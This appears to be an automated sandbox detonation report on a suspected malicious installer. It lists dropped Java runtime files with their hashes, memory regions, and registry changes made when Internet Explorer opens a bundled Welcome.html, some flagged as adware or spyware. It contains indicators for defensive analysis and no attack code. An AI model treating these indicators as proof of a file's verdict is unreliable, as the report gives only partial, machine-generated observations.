
MD5 042b3675517d6a637b95014523b1fd7d
SHA1 82161caf5f0a4112686e4889a9e207c7ba62a880
SHA256 a570f20f8410f9b1b7e093957bf0ae53cae4731afaea624339aa2a897a635f22
SHA512 7672d0b50a92e854d3bd3724d01084cc10a90678b768e9a627baf761993e56a0c6c62c19155649fe9a8ceeabf845d86cbbb606554872ae789018a8b66e5a2b35

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\jphp-gui-ext.jar

MD5 6696368a09c7f8fed4ea92c4e5238cee
SHA1 f89c282e557d1207afd7158b82721c3d425736a7
SHA256 c25d7a7b8f0715729bccb817e345f0fdd668dd4799c8dab1a4db3d6a37e7e3e4
SHA512 0ab24f07f956e3cdcd9d09c3aa4677ff60b70d7a48e7179a02e4ff9c0d2c7a1fc51624c3c8a5d892644e9f36f84f7aaf4aa6d2c9e1c291c88b3cff7568d54f76

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\jphp-desktop-ext.jar

MD5 b50e2c75f5f0e1094e997de8a2a2d0ca
SHA1 d789eb689c091536ea6a01764bada387841264cb
SHA256 cf4068ebb5ecd47adec92afba943aea4eb2fee40871330d064b69770cccb9e23
SHA512 57d8ac613805edada6aeba7b55417fd7d41c93913c56c4c2c1a8e8a28bbb7a05aade6e02b70a798a078dc3c747967da242c6922b342209874f3caf7312670cb0

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\jphp-core.jar

MD5 7e5e3d6d352025bd7f093c2d7f9b21ab
SHA1 ad9bfc2c3d70c574d34a752c5d0ebcc43a046c57
SHA256 5b37e8ff2850a4cbb02f9f02391e9f07285b4e0667f7e4b2d4515b78e699735a
SHA512 c19c29f8ad8b6beb3eed40ab7dc343468a4ca75d49f1d0d4ea0b4a5cee33f745893fba764d35c8bd157f7842268e0716b1eb4b8b26dcf888fb3b3f4314844aad

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\jphp-app-framework.jar

MD5 0c8768cdeb3e894798f80465e0219c05
SHA1 c4da07ac93e4e547748ecc26b633d3db5b81ce47
SHA256 15f36830124fc7389e312cf228b952024a8ce8601bf5c4df806bc395d47db669
SHA512 35db507a3918093b529547e991ab6c1643a96258fc95ba1ea7665ff762b0b8abb1ef732b3854663a947effe505be667bd2609ffcccb6409a66df605f971da106

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\gson.jar

MD5 5134a2350f58890ffb9db0b40047195d
SHA1 751f548c85fa49f330cecbb1875893f971b33c4e
SHA256 2d43eb5ea9e133d2ee2405cc14f5ee08951b8361302fdd93494a3a997b508d32
SHA512 c3cdaf66a99e6336abc80ff23374f6b62ac95ab2ae874c9075805e91d849b18e3f620cc202b4978fc92b73d98de96089c8714b1dd096b2ae1958cfa085715f7a

memory/1676-299-0x00000000028B8000-0x00000000028C0000-memory.dmp

memory/1676-298-0x00000000028B0000-0x00000000028B8000-memory.dmp

memory/1676-297-0x0000000000250000-0x0000000000251000-memory.dmp

memory/1676-303-0x00000000028C0000-0x00000000028C8000-memory.dmp

memory/1676-302-0x00000000027F0000-0x0000000002818000-memory.dmp

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\dn-php-sdk.jar

MD5 3e5e8cccff7ff343cbfe22588e569256
SHA1 66756daa182672bff27e453eed585325d8cc2a7a
SHA256 0f26584763ef1c5ec07d1f310f0b6504bc17732f04e37f4eb101338803be0dc4
SHA512 8ea5f31e25c3c48ee21c51abe9146ee2a270d603788ec47176c16acac15dad608eef4fa8ca0f34a1bbc6475c29e348bd62b0328e73d2e1071aaa745818867522

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\dn-compiled-module.jar

MD5 c7f4b29600c2353f7599dd4da851dae4
SHA1 cfd3a61067e1982a56e1c5c77e53bbd523ad1dcc
SHA256 95371359a009dd7102e05aa36bc395c391772fc6066e95b46cbceadff1b6a58d
SHA512 e51bd0c5ffd5db1746b2d928f4610b7bd186a392652b5cac06200c226c69516933491e8dcb171e27be53fb9b7c5a28b8cd8f0c7bd6d1aaac3211bd5ba2fdaf06

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\COPYRIGHT

MD5 fc605d978e7825595d752df2ef03f8af
SHA1 c493c9541caaee4bfe3b3e48913fd9df7809299f
SHA256 7d697eaa9acf50fe0b57639b3c62ff02916da184f191944f49eca93d0bb3374f
SHA512 fb811de6a2b36b28ca904224ea3525124bd4628ca9618c70eb9234ab231a09c1b1f28d9b6301581a4fa2e20f1036d5e1c3d6f1bf316c7fe78ef6edeae50ea40e

memory/1676-275-0x0000000002890000-0x0000000002898000-memory.dmp

memory/1676-274-0x0000000002830000-0x0000000002838000-memory.dmp

memory/1676-273-0x0000000002888000-0x0000000002890000-memory.dmp

memory/1676-308-0x00000000028C8000-0x00000000028D0000-memory.dmp

memory/1676-307-0x0000000002838000-0x0000000002840000-memory.dmp

memory/1676-311-0x00000000028D0000-0x00000000028D8000-memory.dmp

memory/1676-310-0x0000000002840000-0x0000000002848000-memory.dmp

memory/1676-317-0x00000000028D8000-0x00000000028E0000-memory.dmp

memory/1676-316-0x0000000002828000-0x0000000002830000-memory.dmp

memory/1676-315-0x0000000002890000-0x0000000002898000-memory.dmp

memory/1676-321-0x00000000028E0000-0x00000000028E8000-memory.dmp

memory/1676-314-0x0000000002888000-0x0000000002890000-memory.dmp

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\jphp-zend-ext.jar

MD5 4bc2aea7281e27bc91566377d0ed1897
SHA1 d02d897e8a8aca58e3635c009a16d595a5649d44
SHA256 4aef566bbf3f0b56769a0c45275ebbf7894e9ddb54430c9db2874124b7cea288
SHA512 da35bb2f67bca7527dc94e5a99a162180b2701ddca2c688d9e0be69876aca7c48f192d0f03d431ccd2d8eec55e0e681322b4f15eba4db29ef5557316e8e51e10

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\jphp-xml-ext.jar

MD5 0a79304556a1289aa9e6213f574f3b08
SHA1 7ee3bde3b1777bf65d4f62ce33295556223a26cd
SHA256 434e57fffc7df0b725c1d95cabafdcdb83858ccb3e5e728a74d3cf33a0ca9c79
SHA512 1560703d0c162d73c99cef9e8ddc050362e45209cc8dea6a34a49e2b6f99aae462eae27ba026bdb29433952b6696896bb96998a0f6ac0a3c1dbbb2f6ebc26a7e

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\currency.data

MD5 f6258230b51220609a60aa6ba70d68f3
SHA1 b5b95dd1ddcd3a433db14976e3b7f92664043536
SHA256 22458853da2415f7775652a7f57bb6665f83a9ae9fb8bd3cf05e29aac24c8441
SHA512 b2dfcfdebf9596f2bb05f021a24335f1eb2a094dca02b2d7dd1b7c871d5eecda7d50da7943b9f85edb5e92d9be6b6adfd24673ce816df3960e4d68c7f894563f

memory/1676-327-0x00000000028E8000-0x00000000028F0000-memory.dmp

memory/1676-326-0x0000000002898000-0x00000000028A0000-memory.dmp

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\zt-zip.jar

MD5 0fd8bc4f0f2e37feb1efc474d037af55
SHA1 add8fface4c1936787eb4bffe4ea944a13467d53
SHA256 1e31ef3145d1e30b31107b7afc4a61011ebca99550dce65f945c2ea4ccac714b
SHA512 29de5832db5b43fdc99bb7ea32a7359441d6cf5c05561dd0a6960b33078471e4740ee08ffbd97a5ced4b7dd9cc98fad6add43edb4418bf719f90f83c58188149

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\Welcome.html

MD5 3cb773cb396842a7a43ad4868a23abe5
SHA1 ace737f039535c817d867281190ca12f8b4d4b75
SHA256 f450aee7e8fe14512d5a4b445aa5973e202f9ed1e122a8843e4dc2d4421015f0
SHA512 6058103b7446b61613071c639581f51718c12a9e7b6abd3cf3047a3093c2e54b2d9674faf9443570a3bb141f839e03067301ff35422eb9097bd08020e0dd08a4

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\THIRDPARTYLICENSEREADME.txt

MD5 0e87879f452892b85c81071a1ddd5a2a
SHA1 2cf97c1a84374a6fbbd5d97fe1b432fa799c3b19
SHA256 9c18836fd0b5e4b0c57cffdb74574fa5549085c3b327703dc8efe4208f4e3321
SHA512 10ba68ffd9deab10a0b200707c3af9e95e27aed004f66f049d41310cb041b7618ee017219c848912d5951599208d385bcb928dd33175652101c7e5bc2e3eba5b

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\THIRDPARTYLICENSEREADME-JAVAFX.txt

MD5 0e05bd8b9bfcf17f142445d1f8c6561c
SHA1 cf0a9f4040603008891aa0731abf89ce2403f2fb
SHA256 c3ea3996241b8e9ae7db3780e470174076fd2003d8aefaa77bf0bab5e04de050
SHA512 07c7865d31d22ba0c68e384afedc22261f7b3a82bebc9324145ff7f631623eca2dc31c71cdbbfc9febc1733451a095302de2a0877821a5b68038e350969bf460

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\slf4j-simple.jar

MD5 722bb90689aecc523e3fe317e1f0984b
SHA1 8dacf9514f0c707cbbcdd6fd699e8940d42fb54e
SHA256 0966e86fffa5be52d3d9e7b89dd674d98a03eed0a454fbaf7c1bd9493bd9d874
SHA512 d5effbfa105bcd615e56ef983075c9ef0f52bcfdbefa3ce8cea9550f25b859e48b32f2ec9aa7a305c6611a3be5e0cde0d269588d9c2897ca987359b77213331d

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\slf4j-api.jar

MD5 caafe376afb7086dcbee79f780394ca3
SHA1 da76ca59f6a57ee3102f8f9bd9cee742973efa8a
SHA256 18c4a0095d5c1da6b817592e767bb23d29dd2f560ad74df75ff3961dbde25b79
SHA512 5dd6271fd5b34579d8e66271bab75c89baca8b2ebeaa9966de391284bd08f2d720083c6e0e1edda106ecf8a04e9a32116de6873f0f88c19c049c0fe27e5d820b

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\release

MD5 a61b1e3fe507d37f0d2f3add5ac691e0
SHA1 8ae1050ff466b8f024eed5bc067b87784f19a848
SHA256 f9e84b54cf0d8cb0645e0d89bf47ed74c88af98ac5bf9ccf3accb1a824f7dc3a
SHA512 3e88a839e44241ae642d0f9b7000d80be7cf4bd003a9e2f9f04a4feb61ec4877b2b4e76151503184f4b9978894ba1d0de034dbc5f2e51c31b3abb24f0eacf0c7

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\README.txt

MD5 4bda1f1b04053dcfe66e87a77b307bb1
SHA1 b8b35584be24be3a8e1160f97b97b2226b38fa7d
SHA256 fd475b1619675b9fb3f5cd11d448b97eddee8d1f6ddcca13ded8bc6e0caa9cf3
SHA512 997cee676018076e9e4e94d61ec94d5b69b148b3152a0148e70d0be959533a13ad0bc1e8b43268f91db08b881bf5050a6d5c157d456597260a2b332a48068980

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\LICENSE

MD5 67cb88f6234b6a1f2320a23b197fa3f6
SHA1 877aceba17b28cfff3f5df664e03b319f23767a1
SHA256 263e21f4b43c118a8b4c07f1a8acb11cafc232886834433e34187f5663242360
SHA512 4d43e5edecab92cebd853204c941327dccbfd071a71f066c12f7fb2f1b2def59c37a15ce05c4fe06ec2ea296b8630c4e938254a8a92e149e4a0a82c4307d648f

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\jphp-zip-ext.jar

MD5 20f6f88989e806d23c29686b090f6190
SHA1 1fdb9a66bb5ca587c05d3159829a8780bb66c87d
SHA256 9d5f06d539b91e98fd277fc01fd2f9af6fea58654e3b91098503b235a83abb16
SHA512 2798bb1dd0aa121cd766bd5b47d256b1a528e9db83ed61311fa685f669b7f60898118ae8c69d2a30d746af362b810b133103cbe426e0293dd2111aca1b41ccea

memory/1676-341-0x00000000028F0000-0x00000000028F8000-memory.dmp

memory/1676-340-0x00000000028A0000-0x00000000028A8000-memory.dmp

memory/1676-345-0x00000000028F8000-0x0000000002900000-memory.dmp

memory/1676-344-0x00000000028A8000-0x00000000028B0000-memory.dmp

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\jsse.jar

MD5 fd1434c81219c385f30b07e33cef9f30
SHA1 0b5ee897864c8605ef69f66dfe1e15729cfcbc59
SHA256 bc3a736e08e68ace28c68b0621dccfb76c1063bd28d7bd8fce7b20e7b7526cc5
SHA512 9a778a3843744f1fabad960aa22880d37c30b1cab29e123170d853c9469dc54a81e81a9070e1de1bf63ba527c332bb2b1f1d872907f3bdce33a6898a02fef22d

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\security\java.security

MD5 409c132fe4ea4abe9e5eb5a48a385b61
SHA1 446d68298be43eb657934552d656fa9ae240f2a2
SHA256 4d9e5a12b8cac8b36ecd88468b1c4018bc83c97eb467141901f90358d146a583
SHA512 7fed286ac9aed03e2dae24c3864edbbf812b65965c7173cc56ce622179eb5f872f77116275e96e1d52d1c58d3cdebe4e82b540b968e95d5da656aa74ad17400d

\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\net.dll

MD5 691b937a898271ee2cffab20518b310b
SHA1 abedfcd32c3022326bc593ab392dea433fcf667c
SHA256 2f5f1199d277850a009458edb5202688c26dd993f68fe86ca1b946dc74a36d61
SHA512 1c09f4e35a75b336170f64b5c7254a51461dc1997b5862b62208063c6cf84a7cb2d66a67e947cbbf27e1cf34ccd68ba4e91c71c236104070ef3beb85570213ec

\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\nio.dll

MD5 95edb3cb2e2333c146a4dd489ce67cbd
SHA1 79013586a6e65e2e1f80e5caf9e2aa15b7363f9a
SHA256 96cf590bddfd90086476e012d9f48a9a696efc054852ef626b43d6d62e72af31
SHA512 ab671f1bce915d748ee49518cc2a666a2715b329cab4ab8f6b9a975c99c146bb095f7a4284cd2aaf4a5b4fcf4f939f54853af3b3acc4205f89ed2ba8a33bb553

memory/1676-360-0x0000000002900000-0x0000000002908000-memory.dmp

memory/1676-359-0x00000000028B8000-0x00000000028C0000-memory.dmp

memory/1676-363-0x0000000002908000-0x0000000002910000-memory.dmp

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\tzdb.dat

MD5 5a7f416bd764e4a0c2deb976b1d04b7b
SHA1 e12754541a58d7687deda517cdda14b897ff4400
SHA256 a636afa5edba8aa0944836793537d9c5b5ca0091ccc3741fc0823edae8697c9d
SHA512 3ab2ad86832b98f8e5e1ce1c1b3ffefa3c3d00b592eb1858e4a10fff88d1a74da81ad24c7ec82615c398192f976a1c15358fce9451aa0af9e65fb566731d6d8f

memory/1676-358-0x00000000028B0000-0x00000000028B8000-memory.dmp

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\tzmappings

MD5 b8dd8953b143685b5e91abeb13ff24f0
SHA1 b5ceb39061fce39bb9d7a0176049a6e2600c419c
SHA256 3d49b3f2761c70f15057da48abe35a59b43d91fa4922be137c0022851b1ca272
SHA512 c9cd0eb1ba203c170f8196cbab1aaa067bcc86f2e52d0baf979aad370edf9f773e19f430777a5a1c66efe1ec3046f9bc82165acce3e3d1b8ae5879bd92f09c90

memory/1676-368-0x0000000002910000-0x0000000002918000-memory.dmp

memory/1676-367-0x00000000028C0000-0x00000000028C8000-memory.dmp

memory/1676-372-0x0000000002918000-0x0000000002920000-memory.dmp

memory/1676-371-0x00000000028C8000-0x00000000028D0000-memory.dmp

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\resources.jar

MD5 9a084b91667e7437574236cd27b7c688
SHA1 d8926cc4aa12d6fe9abe64c8c3cb8bc0f594c5b1
SHA256 a1366a75454fc0f1ca5a14ea03b4927bb8584d6d5b402dfa453122ae16dbf22d
SHA512 d603aa29e1f6eefff4b15c7ebc8a0fa18e090d2e1147d56fd80581c7404ee1cb9d6972fcf2bd0cb24926b3af4dfc5be9bce1fe018681f22a38adaa278bf22d73

memory/1676-377-0x0000000002920000-0x0000000002928000-memory.dmp

memory/1676-376-0x00000000028D0000-0x00000000028D8000-memory.dmp

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\msvcp120.dll

MD5 fd5cabbe52272bd76007b68186ebaf00
SHA1 efd1e306c1092c17f6944cc6bf9a1bfad4d14613
SHA256 87c42ca155473e4e71857d03497c8cbc28fa8ff7f2c8d72e8a1f39b71078f608
SHA512 1563c8257d85274267089cd4aeac0884a2a300ff17f84bdb64d567300543aa9cd57101d8408d0077b01a600ddf2e804f7890902c2590af103d2c53ff03d9e4a5

\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\msvcr120.dll

MD5 034ccadc1c073e4216e9466b720f9849
SHA1 f19e9d8317161edc7d3e963cc0fc46bd5e4a55a1
SHA256 86e39b5995af0e042fcdaa85fe2aefd7c9ddc7ad65e6327bd5e7058bc3ab615f
SHA512 5f11ef92d936669ee834a5cef5c7d0e7703bf05d03dc4f09b9dcfe048d7d5adfaab6a9c7f42e8080a5e9aad44a35f39f3940d5cca20623d9cafe373c635570f7

memory/1676-393-0x00000000028F0000-0x00000000028F8000-memory.dmp

memory/1676-392-0x00000000003A0000-0x00000000003AA000-memory.dmp

memory/1676-391-0x00000000028E8000-0x00000000028F0000-memory.dmp

memory/1676-390-0x00000000028E0000-0x00000000028E8000-memory.dmp

memory/1676-396-0x0000000000250000-0x0000000000251000-memory.dmp

memory/1676-398-0x0000000000250000-0x0000000000251000-memory.dmp

memory/1676-389-0x00000000003A0000-0x00000000003AA000-memory.dmp

memory/1676-388-0x00000000003A0000-0x00000000003AA000-memory.dmp

memory/1676-387-0x00000000028D8000-0x00000000028E0000-memory.dmp

memory/1676-413-0x0000000000250000-0x0000000000251000-memory.dmp

memory/1676-425-0x00000000028F8000-0x0000000002900000-memory.dmp

memory/1676-436-0x0000000000250000-0x0000000000251000-memory.dmp

memory/1676-440-0x0000000002900000-0x0000000002908000-memory.dmp

memory/1676-443-0x0000000002908000-0x0000000002910000-memory.dmp

memory/1676-444-0x0000000002910000-0x0000000002918000-memory.dmp

memory/1676-445-0x0000000002918000-0x0000000002920000-memory.dmp

memory/1676-447-0x0000000002920000-0x0000000002928000-memory.dmp

memory/1676-448-0x0000000000250000-0x0000000000251000-memory.dmp

memory/1676-449-0x0000000000250000-0x0000000000251000-memory.dmp

memory/1676-475-0x0000000000250000-0x0000000000251000-memory.dmp

memory/3012-476-0x000007FEF6610000-0x000007FEF6768000-memory.dmp

memory/3012-485-0x000007FEF78B0000-0x000007FEF78E4000-memory.dmp

memory/3012-484-0x000000013F060000-0x000000013F158000-memory.dmp

memory/1676-487-0x00000000003A0000-0x00000000003AA000-memory.dmp

memory/3012-486-0x0000000140000000-0x00000001402B5000-memory.dmp

memory/1176-488-0x000007FEF7340000-0x000007FEF7498000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\X7R8H1BWVVSVKUKXNZ78.temp

MD5 2af0e4ebcfb104d935542c7601f9b5e0
SHA1 7bc1fd56219ca1f71ca211ef137493741f014b54
SHA256 27ccfe87b4aa9392ff6a22faead3a0a9ae9554e09bfe523f70624ac2e0bfcc99
SHA512 92226d3ad14cd32aa162cafdc7e0a9bdfbd1f391945dd330b7087ac4b476d43c452d2bc0f587b8cba1928f15a25ebf8cf2e248bfd07088ca6bc62dd924f4e13a

memory/1676-493-0x0000000000250000-0x0000000000251000-memory.dmp

memory/1676-497-0x0000000000250000-0x0000000000251000-memory.dmp

memory/1676-498-0x0000000000250000-0x0000000000251000-memory.dmp

memory/1676-521-0x00000000028E8000-0x00000000028F0000-memory.dmp

memory/1676-520-0x0000000002920000-0x0000000002928000-memory.dmp

memory/1676-519-0x0000000002918000-0x0000000002920000-memory.dmp

memory/1676-518-0x0000000002910000-0x0000000002918000-memory.dmp

memory/1676-517-0x0000000002908000-0x0000000002910000-memory.dmp

memory/1676-516-0x0000000002900000-0x0000000002908000-memory.dmp

memory/1676-515-0x00000000028F8000-0x0000000002900000-memory.dmp

memory/1676-514-0x00000000028F0000-0x00000000028F8000-memory.dmp

memory/1676-513-0x00000000028E0000-0x00000000028E8000-memory.dmp

memory/1676-512-0x00000000028D8000-0x00000000028E0000-memory.dmp

memory/1676-511-0x00000000028D0000-0x00000000028D8000-memory.dmp

memory/1676-510-0x00000000028C8000-0x00000000028D0000-memory.dmp

memory/1676-509-0x00000000028C0000-0x00000000028C8000-memory.dmp

memory/1676-508-0x00000000028B8000-0x00000000028C0000-memory.dmp

memory/1676-507-0x00000000028B0000-0x00000000028B8000-memory.dmp

memory/1676-506-0x00000000028A8000-0x00000000028B0000-memory.dmp

memory/1676-505-0x00000000028A0000-0x00000000028A8000-memory.dmp

memory/1676-504-0x0000000002898000-0x00000000028A0000-memory.dmp

memory/1676-503-0x0000000002828000-0x0000000002830000-memory.dmp

memory/1676-502-0x0000000002890000-0x0000000002898000-memory.dmp

memory/1676-501-0x0000000002888000-0x0000000002890000-memory.dmp

memory/1676-500-0x0000000002840000-0x0000000002848000-memory.dmp

memory/1676-499-0x0000000002838000-0x0000000002840000-memory.dmp

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 392f34096439ab16d007f406d57f36a3
SHA1 9bc126dc9680dff732c03da0186c0b99e77502c7
SHA256 0d1697779b71abf6fe040f5ebc7383dbb6f075a7221af03526f0b5e42d165fdc
SHA512 2f7dbc5130fc85dfd037ca4fc20f1262f03e8b909522f07ce87656bd611a594934a2e35dc4ded0c1b2e240c4a8ab588ffdf3c81aed6ead50d2ea8608bd78c1ec

memory/1176-537-0x000007FEF7340000-0x000007FEF7498000-memory.dmp

memory/1176-539-0x000000013F520000-0x000000013F618000-memory.dmp

memory/1176-541-0x0000000140000000-0x00000001402B5000-memory.dmp

memory/2420-543-0x0000000077BE0000-0x0000000077D89000-memory.dmp

memory/2420-544-0x0000000074D90000-0x0000000074F04000-memory.dmp

memory/2812-546-0x0000000077BE0000-0x0000000077D89000-memory.dmp

memory/2812-547-0x0000000000400000-0x0000000000465000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabC026.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\TarC058.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Analysis: behavioral5

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:15

Platform

win7-20240903-en

Max time kernel

120s

Max time network

131s

Command Line

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\jre\Welcome.html

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 904123715e18db01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000045c0dde48c11474f81d9a2c02be4ea2200000000020000000000106600000001000020000000fc5f2b1b1738ceea365af3753a4a7ca64d79b890c03037e6af8d2c386e40e887000000000e8000000002000020000000e4edbdbb3f7426acf93ffd0d2fd2e1f75088c9e23670eeb3a6dc259181b0f2c420000000dbeae45304b38368d5f75e1d78086ca77839c1705247b10c9e21005a2f7fca9840000000693e3f407565753ede0d3ab93b79d566bf14e509466bbb1614727986931f2fc72ed773fa012de0ca39049653e053aca0b8c704949d251307a158bac28e54d8c9 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "434429020" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{9CA62BC1-8451-11EF-87E3-523A95B0E536} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
